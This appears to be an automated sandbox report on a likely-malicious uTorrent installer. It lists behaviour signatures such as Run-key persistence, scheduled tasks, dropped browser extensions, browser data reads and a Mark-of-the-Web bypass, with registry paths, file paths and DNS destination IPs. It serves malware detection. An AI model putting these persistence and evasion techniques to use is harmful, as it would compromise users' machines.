Analysis Overview
SHA256
401409e8da7321fb94a1a8ac6217d2dd067007d29547257575c26a39f31e8931
Threat Level: Likely malicious
The file utorrent_installer.exe was found to be: Likely malicious.
Malicious Activity Summary
Contacts a large (537) amount of remote hosts
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Unexpected DNS network traffic destination
Checks BIOS information in registry
Identifies Wine through registry keys
Indirect Command Execution
Adds Run key to start application
Network Share Discovery
Enumerates connected drives
Drops desktop.ini file(s)
Downloads MZ/PE file
Drops Chrome extension
Detected potential entity reuse from brand STEAM.
Drops file in System32 directory
UPX packed file
Checks computer location settings
Executes dropped EXE
Drops file in Program Files directory
Loads dropped DLL
Drops file in Windows directory
Checks installed software on the system
Subvert Trust Controls: Mark-of-the-Web Bypass
Unsigned PE
System Location Discovery: System Language Discovery
Reads user/profile data of web browsers
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Program crash
Browser Information Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
Enumerates system info in registry
NTFS ADS
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Modifies system certificate store
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Runs net.exe
Suspicious behavior: GetForegroundWindowSpam
Modifies Control Panel
Modifies registry class
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-15 03:47
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-15 03:46
Reported
2024-11-15 04:04
Platform
win11-20241007-en
Max time kernel
1050s
Max time network
1051s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Contacts a large (537) amount of remote hosts
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Software\WOW6432Node\Wine | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Software\WOW6432Node\Wine | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Software\WOW6432Node\Wine | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
Indirect Command Execution
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 152.89.198.214 | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\ut = "C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe /MINIMIZED" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -silent" | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
Downloads MZ/PE file
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe | N/A |
Network Share Discovery
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
Detected potential entity reuse from brand STEAM.
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B5CFE5FD779BB3279A8A1976B86E6FEF | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B5CFE5FD779BB3279A8A1976B86E6FEF | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019 | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks installed software on the system
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_schinese.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\bin\SteamService.exe | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_german.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_spanish.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Steam\logs\bootstrap_log.txt | C:\Program Files (x86)\Steam\steam.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_thai.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Steam\steamservice.exe | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| File created | C:\Program Files (x86)\Steam\.writable | C:\Program Files (x86)\Steam\steam.exe | N/A |
| File created | C:\Program Files (x86)\Steam\package\strings_all.zip.vz.c904f95b8996c66336305408448b8bede03956d6_2006928 | C:\Program Files (x86)\Steam\steam.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_romanian.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_turkish.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_ukrainian.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_greek.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_tchinese.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\logs\bootstrap_log.txt | C:\Program Files (x86)\Steam\steam.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_brazilian.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_english.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\fUiCNqd.xml | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_danish.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_dutch.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\Steam\Steam.exe | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_latam.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_norwegian.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_russian.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\NOWTtjuGDiydC\dgUUnMX.xml | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_korean.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\package\tenfoot_images_all.zip.vz.193cb8c4eb4446698ea2c0a9e8c4e6b6a623dac7_5572671 | C:\Program Files (x86)\Steam\steam.exe | N/A |
| File created | C:\Program Files (x86)\Steam\package\resources_misc_all.zip.vz.e86a975545f3ab21a77373870cb311ef93934b8c_2224876 | C:\Program Files (x86)\Steam\steam.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_hungarian.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_koreana.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\package\resources_hidpi_all.zip.vz.3de815c3117712cb9eeb7ea4c8b275faf481dcfd_56342 | C:\Program Files (x86)\Steam\steam.exe | N/A |
| File created | C:\Program Files (x86)\OMeOFycTU\znOYOp.dll | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_italian.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\package\strings_en_all.zip.147798246441b35c9a4dbdeecef8d6c4ffda4346 | C:\Program Files (x86)\Steam\steam.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_french.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_swedish.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\uninstall.exe | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\RnBNRnIwUzVU2\MzxnQOmYFOtpQ.dll | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\odFjQhT.dll | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\NOWTtjuGDiydC\fYhThFs.dll | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_czech.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Steam\.crash | C:\Program Files (x86)\Steam\steam.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_polish.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Steam\steamservice.exe | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\OMeOFycTU\jJabmpg.xml | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\RnBNRnIwUzVU2\TrizmLz.xml | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\kmKpunNFSNUn\iHvZWGY.dll | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_indonesian.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_bulgarian.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_japanese.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_portuguese.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_vietnamese.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| File created | C:\Program Files (x86)\Steam\package\resources_all.zip.vz.3c8b3203e5c69d75ea0684c2409b86fe4d0d6f83_2856188 | C:\Program Files (x86)\Steam\steam.exe | N/A |
| File created | C:\Program Files (x86)\Steam\public\steambootstrapper_finnish.txt | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\manifest.fingerprint | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\Tasks\coQLnzjOCQIuUMNyn.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\VGggbamSlsorNxx.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\kWTyeDFhQZoEtpUUx.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\_platform_specific\win_x86\widevinecdm.dll.sig | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\LICENSE | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\manifest.json | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\_platform_specific\win_x86\widevinecdm.dll | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\_metadata\verified_contents.json | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\Tasks\bhzAbyJhiYArNEwhRY.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\SteamSetup.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
Reads user/profile data of web browsers
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe | N/A |
